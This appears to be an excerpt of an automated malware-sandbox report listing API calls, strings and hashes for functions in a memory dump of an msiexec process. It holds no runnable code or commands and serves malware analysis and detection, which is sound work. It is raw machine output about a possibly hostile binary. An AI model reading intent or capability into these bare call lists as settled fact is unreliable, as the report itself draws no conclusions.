                                                                                                                                                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                      • strchr.MSVCRT ref: 0040C140
                                                                                                                                                      • strchr.MSVCRT ref: 0040C151
                                                                                                                                                      • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                      • memset.MSVCRT ref: 0040C17A
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                      • String ID: 4$h
                                                                                                                                                      • API String ID: 4019544885-1856150674
                                                                                                                                                      • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                      • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                      • String ID: 0$6
                                                                                                                                                      • API String ID: 4066108131-3849865405
                                                                                                                                                      • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                      • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004082EF
                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                      • memset.MSVCRT ref: 00408362
                                                                                                                                                      • memset.MSVCRT ref: 00408377
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$ByteCharMultiWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 290601579-0
                                                                                                                                                      • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                                                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                      • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                                                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                      APIs
                                                                                                                                                      • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                      • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                      • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                      • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                      • memset.MSVCRT ref: 0044505E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$memchrmemset
                                                                                                                                                      • String ID: PD$PD
                                                                                                                                                      • API String ID: 1581201632-2312785699
                                                                                                                                                      • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                      • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                      • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                      • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                      • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                      • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2163313125-0
                                                                                                                                                      • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                      • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                      • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                      • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3592753638-3916222277
                                                                                                                                                      • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                      • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040A47B
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                      • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                      • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                      • String ID: %s (%s)$YV@
                                                                                                                                                      • API String ID: 3979103747-598926743
                                                                                                                                                      • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                      • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                      • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                                                                                      • API String ID: 2767993716-572158859
                                                                                                                                                      • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                      • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                      • API String ID: 3176057301-2039793938
                                                                                                                                                      • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                      • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                      • database is already attached, xrefs: 0042F721
                                                                                                                                                      • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                      • out of memory, xrefs: 0042F865
                                                                                                                                                      • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                      • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                                                                      • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                      • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                                                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                                                                                      • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                                                                      • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                      • String ID: ($d
                                                                                                                                                      • API String ID: 1140211610-1915259565
                                                                                                                                                      • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                                                                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                      • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                                                                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                      APIs
                                                                                                                                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                      • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3015003838-0
                                                                                                                                                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00407E44
                                                                                                                                                      • memset.MSVCRT ref: 00407E5B
                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                      • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 59245283-0
                                                                                                                                                      • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                      • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                      • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                      • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy
                                                                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                                                                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                      APIs
                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                      • memset.MSVCRT ref: 00413ADC
                                                                                                                                                      • memset.MSVCRT ref: 00413AEC
                                                                                                                                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                      • memset.MSVCRT ref: 00413BD7
                                                                                                                                                      • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                      • String ID: 3A
                                                                                                                                                      • API String ID: 3300951397-293699754
                                                                                                                                                      • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                      • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                      • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                      • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                      • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                      • String ID: strings
                                                                                                                                                      • API String ID: 3166385802-3030018805
                                                                                                                                                      • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                      • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0041249C
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                      • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                      • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                      • String ID: r!A
                                                                                                                                                      • API String ID: 2791114272-628097481
                                                                                                                                                      • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                                                                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                      • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
